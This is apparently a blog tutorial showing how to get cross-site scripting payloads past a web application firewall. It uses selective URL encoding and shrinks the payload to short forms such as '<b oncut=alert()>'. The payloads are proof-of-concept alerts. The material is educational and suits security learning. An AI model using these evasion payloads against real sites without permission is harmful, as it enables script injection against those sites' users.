Hacking Tutorials XSS

Bypassing WAF with Shortest XSS Payload

Welcome back XSSers! Today we are going to learn xss, bypass a WAF and we will do it with the shortest payload possible.

So I have a webpage here

and I am going to enter our classic payload i.e.

<script>alert(1)</script>


Oppps! Access Denied! Looks like some WAF is blocking our way. So I am going to encode our payload with URL encoding. Well you can find some websites on google which can do this but I like to use HackBar plugin for Mozilla Firefox.
So I entered my payload and clicked on the Encode button

and here we have this beautiful URL encoded payload

So lets see if it works or not

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e


Hell yeah! We successfully XSSed it!
Hmmm that was really easy but what if the search form doesn’t allow us to enter more than 35 characters? or 25?
Lets try to shorten this 75 characters long payload.
First of all, we don’t really need to encode everything. Like why would a WAF block alphabets? So lets try to find what characters are blocked by the WAF by trying different variations of the payload.

%3cscript%3ealert(1)%3c%2fscript%3e Success
%3cscript>alert(1)%3c%2fscript> Access Denied
<script%3ealert(1)%3c/fscript%3e Access Denied

……..

%3cscript%3ealert(1)%3c/script> Success

And actually we can also use alert() instead of alert(1). alert() will give us a blank alert pop up and will save us 1 character.
So here’s our final payload with 31 characters:

%3cscript%3ealert()%3c/script>

As you know JavaScript is not limited to script tag. So lets try to create payloads with different tags and event handlers.

<svg onload=alert()> Access Denied
%3c%73%76%67%20%6f%6e%6c%6f%61%64%3d%61%6c%65%72%74%28%29%3e Success

Tried different variations of the payload find out what should be encoded and here’s what I got:

%3csvg onload%3dalert()> Success

Thus we shortened our payload to 24 characters! Can we make it even shorter? Yes we can and actually I did. Take a look at this beautifully crafted payload

%3cb oncut%3dalert()>

Without encoding it looks like this

<b oncut=alert()>

If you enter this payload, nothing will happen

But as soon as you try to cut some text from the webpage..

You will see the miracle of XSS!

Thanks for reading the article! Actually its based on a XSS Challenge held in Ultimate Hackers’s facebook group, where competed against each other to XSS with the shortest payload.

Well that’s all for now! I hope you learned something new today!

Also Read: Do You Need To Learn Programming To Become A Hacker?


About the author

D3V

I am Somdev Sangwan also known as D3V. I am n00b and I love computers and hacking. I am a python freak and your friendly neighborhood hacker.

4 Comments

Click here to post a comment

Browse Categories:

Subscribe Now

Get the latest post directly into your inbox.

Thank you for subscribing.

Something went wrong.